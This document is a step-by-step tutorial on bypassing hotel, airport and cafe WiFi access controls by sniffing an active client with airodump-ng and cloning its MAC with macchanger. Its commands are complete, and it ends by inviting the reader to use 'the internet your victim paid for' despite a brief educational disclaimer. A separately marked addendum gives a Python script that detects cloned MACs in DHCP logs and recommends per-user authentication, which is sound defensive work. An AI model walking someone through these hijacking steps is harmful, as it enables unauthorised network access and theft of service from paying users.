Bypass WIFI Access Controls
*****************DISCLAIMER************************
This tutorial is designed for educational purposes only. This tutorial should not be used for unlawful access to paid internet connections. It is designed to show flaws in MAC address access controls and filtering. It is illegal to use the methods in this tutorial to gain access to a network you do not own or have administrative access to.
***************************************************
This tutorial covers using session stealing to bypass WiFi access controls like those used at many airports, hotels, and Starbucks!
All of the below commands should be performed as root, or with sudo.
Setup
First, you must have the Aircrack-ng Suite of tools installed so we can use airmon-ng to scan for active hosts:
**IMPORTANT: Your wireless card does not have to be compatible with packet injection!!! If it works when you type "airmon-ng start", then you are good to go! 99% of wireless cards will work for this!
sudo apt-get install aircrack-ng
Next, you must install macchanger; it's a tool used to spoof your MAC address to match an active client's:
sudo apt-get install macchanger
Session Stealing
First, find your wireless device name, usually "wlan0", and put it in monitor mode with airmon-ng:
sudo airmon-ng start wlan0
**note: your device is probably named "mon0" now, or if it is USB, the name may not have changed.
Now, scan for your target network by typing:
sudo airodump-ng mon0
1. Look at the list of networks, find the one you are targeting, and copy its BSSID.
2. Now filter out other networks and users by monitoring just the network you are targeting (substitute the BSSID you copied):
sudo airodump-ng --bssid <BSSID> mon0
3. Find an active session with a host that we can steal.
4. Copy the MAC address of the client whose session we are going to steal.
5. Stop monitor mode on your wireless device. If it is USB, just unplug it and plug it back in; if it is an internal wireless card, type:
sudo airmon-ng stop mon0 **note: if your device is not "mon0", type whatever it was named after you started it.
6. Now spoof your MAC address to match the client we just copied:
   1. Stop the wireless device: sudo ifconfig wlan0 down **substitute your device name for wlan0.
   2. Change the MAC address (substitute the client MAC you copied): sudo macchanger -m <client MAC> wlan0
   3. Start the wireless device: sudo ifconfig wlan0 up **substitute your device name for wlan0.
7. Use the connection manager to connect, and you have now stolen a session, and can use the internet your victim paid for!
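The flaw the tutorial demonstrates is that the portal keys an authorised session on the client MAC alone. The gateway side of that weakness can be watched for: as an added example (not part of this tutorial), the script below scans dnsmasq-style DHCPACK log lines and flags any MAC that shows up with more than one IP or more than one hostname, which is what a cloned MAC typically looks like to the DHCP server. The log format and all sample lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of dnsmasq-style DHCP log lines (not real data).
# aa:bb:cc:dd:ee:01 is later re-used by a second device with another hostname.
SAMPLE_LOG = """\
Jan 10 12:01:03 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.23 aa:bb:cc:dd:ee:01 guest-laptop
Jan 10 12:04:17 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.24 aa:bb:cc:dd:ee:02 tablet
Jan 10 12:09:41 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.23 aa:bb:cc:dd:ee:01 guest-laptop
Jan 10 12:15:02 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.57 aa:bb:cc:dd:ee:01 second-device
"""

# Matches "DHCPACK(<iface>) <ip> <mac> [<hostname>]" as dnsmasq logs it.
DHCPACK_RE = re.compile(
    r"DHCPACK\((?P<iface>\S+)\)\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?:\s+(?P<host>\S+))?",
    re.IGNORECASE,
)


def parse_acks(log_text):
    """Yield (mac, ip, hostname) for every DHCPACK line; hostname may be None."""
    for line in log_text.splitlines():
        m = DHCPACK_RE.search(line)
        if m:
            yield m["mac"].lower(), m["ip"], m["host"]


def find_shared_macs(log_text):
    """Return {mac: {"ips": set, "hosts": set}} for MACs seen with more than one
    IP or more than one hostname. One physical NIC should do neither inside a
    single lease period, so each hit is a lead to correlate against the portal's
    session table (lease expiry or a renamed host can also trigger it)."""
    seen = defaultdict(lambda: {"ips": set(), "hosts": set()})
    for mac, ip, host in parse_acks(log_text):
        seen[mac]["ips"].add(ip)
        if host:
            seen[mac]["hosts"].add(host)
    return {mac: v for mac, v in seen.items()
            if len(v["ips"]) > 1 or len(v["hosts"]) > 1}


if __name__ == "__main__":
    for mac, info in find_shared_macs(SAMPLE_LOG).items():
        print(f"{mac}: ips={sorted(info['ips'])} hosts={sorted(info['hosts'])}")
```

Detection only narrows the window; the durable fix is to stop keying access on the MAC at all and authenticate each user (for example WPA2-Enterprise/802.1X or a per-user portal credential tied to the session).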